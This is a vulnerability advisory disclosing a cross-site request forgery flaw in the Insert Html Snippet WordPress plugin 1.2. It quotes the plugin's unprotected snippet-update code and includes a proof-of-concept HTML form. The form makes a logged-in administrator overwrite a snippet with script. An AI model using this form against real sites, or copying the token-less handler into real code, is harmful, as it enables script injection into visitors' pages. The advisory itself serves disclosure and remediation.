Cross-Site Request Forgery in Insert Html Snippet WordPress Plugin

OVE ID

OVE-20160724-0027

Abstract

It was discovered that the Insert Html Snippet WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to update an existing HTML snippet. This can be used to insert arbitrary HTML and scripting code within a post or page that uses the snippet. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Tested versions

This issue was successfully tested on Insert Html Snippet WordPress Plugin version 1.2.

Fix

This issue has been addressed in Insert Html Snippet version 1.2.1.

Introduction

Insert Html Snippet is a plugin for WordPress that allows you to add HTML, CSS and javascript code to your pages and posts easily using shortcodes. It was discovered that the Insert Html Snippet WordPress Plugin is vulnerable to Cross-Site Request Forgery. Amongst others, this issue can be used to update an existing HTML snippet. This can be used to insert arbitrary HTML and scripting code within a post or page that uses the snippet.

Details

This issue exists because Insert Html Snippet lacks protection against Cross-Site Request Forgery attacks. See for example the code that is used to edit a snippet.

if(isset($_POST) && isset($_POST['updateSubmit'])){
	
// 		echo '<pre>';
// 		print_r($_POST);
// 		die("JJJ");
	$_POST = stripslashes_deep($_POST);
	$_POST = xyz_trim_deep($_POST);
	
	$xyz_ihs_snippetId = $_GET['snippetId'];
	
	$temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
	$temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);
	
	$xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
	$xyz_ihs_content = $_POST['snippetContent'];
	
	if($xyz_ihs_title != "" && $xyz_ihs_content != ""){
	
		if(ctype_alnum($temp_xyz_ihs_title))
		{
		$snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM '.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT 0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;
	
		if($snippet_count == 0){
			$xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';
	
			**$wpdb->update($wpdb->prefix.'xyz_ihs_short_code', array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,), array('id'=>$xyz_ihs_snippetId));**

In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1" method="POST">
			<input type="hidden" name="snippetId" value="1" />
			<input type="hidden" name="snippetTitle" value="Fu" />
			<input type="hidden" name="snippetContent" value="<script>alert(1);</script>" />
			<input type="hidden" name="updateSubmit" value="Update" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

Vragen of feedback?